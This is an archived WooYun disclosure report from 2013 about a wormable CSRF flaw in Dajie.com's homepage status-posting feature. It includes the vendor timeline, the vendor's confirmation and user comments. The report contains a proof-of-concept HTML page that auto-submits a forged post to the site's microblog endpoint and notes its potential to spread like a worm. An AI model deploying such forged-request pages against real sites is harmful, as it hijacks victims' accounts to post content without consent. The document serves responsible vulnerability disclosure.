当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2013-016953

漏洞标题: 大街网首页发布状态可蠕虫

相关厂商:大杰世纪科技发展(北京)有限公司

漏洞作者: 小胖胖要减肥

提交时间:2013-01-11 12:45

修复时间:2013-02-25 12:45

公开时间:2013-02-25 12:45

漏洞类型:CSRF

危害等级:高

自评Rank:15

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2013-01-11: 细节已通知厂商并且等待厂商处理中
2013-01-11: 厂商已经确认,细节仅向厂商公开
2013-01-21: 细节向核心白帽子及相关领域专家公开
2013-01-31: 细节向普通白帽子公开
2013-02-10: 细节向实习白帽子公开
2013-02-25: 细节向公众公开

简要描述:

大街网首页发布状态可蠕虫

详细说明:

肯定不止首页一个地方,慢慢挖把,估计全站csrf没防御,关键功能影响肯定会很大,先发个可蠕虫的
html

<html>
<body>
<form id="wrhoooo" name="wrhoooo" action="http://www.dajie.com/microblog/create" method="post">
<input type="test" name="displayContent" value=“test” />
<input type="test" name="content" value=“test” />
<input type="test" name="image" value=“” />
</form>
<script>
document.wrhoooo.submit();
</script>
</body>
</html>


可参考之前的新浪蠕虫事件

漏洞证明:

dajiewang.jpg


要好的效果自己稍微修改下就好了,能证明就可以了

修复方案:

全站问题,关键功能token,不然会很严重

版权声明:转载请注明来源 小胖胖要减肥@乌云

漏洞回应

厂商回应:

危害等级:高

漏洞Rank:20

确认时间:2013-01-11 13:44

厂商回复:

感谢您对大街网的支持,我们会马上修正相关漏洞,谢谢~

最新状态:

暂无

漏洞评价:

评论

  1. 2013-01-11 14:08 | 风萧萧 认证白帽子 ( 核心白帽子 | Rank:1020 漏洞数:76 | 人这一辈子总要动真格的爱上什么人)

    你是奔着礼物来的,我知道的·

  2. 2013-01-11 14:19 | 小胖胖要减肥 认证白帽子 ( 普通白帽子 | Rank:686 漏洞数:101 )

    @风萧萧 别那么直接嘛,我是想刷点分 现在连半个ipad都不够。。。。

  3. 2013-01-11 14:55 | px1624 ( 普通白帽子 | Rank:1036 漏洞数:175 | px1624)

    。。。郁闷,这个我提交的很早诶。。。一直都没给审核、、、

  4. 2013-02-11 13:08 | px1624 ( 普通白帽子 | Rank:1036 漏洞数:175 | px1624)

    怎么这代码的value的双引号都是中文的。。。

  5. 2013-02-25 15:41 | 雅柏菲卡 ( 普通白帽子 | Rank:1213 漏洞数:234 | 雙魚座聖鬥士雅柏菲卡)

    @小胖胖要减肥 风妹妹很直接的 她说话向来直爽 我代她向你配个不是。

  6. 2013-02-25 17:20 | 小胖胖要减肥 认证白帽子 ( 普通白帽子 | Rank:686 漏洞数:101 )

    @风萧萧 @雅柏菲卡 哦 原来她是你妹妹啊

  7. 2013-04-19 00:19 | 过客 ( 实习白帽子 | Rank:42 漏洞数:13 )

    @大杰世纪科技发展(北京)有限公司 厂商就是不自觉啊,非要上了wooyun 才肯修复漏洞。这个漏洞我在去年9月份发现,在大街网上只找到一个邮箱,corp@dajie.com,就在9月13号把漏洞细节发到这邮箱,至今没有任何回复。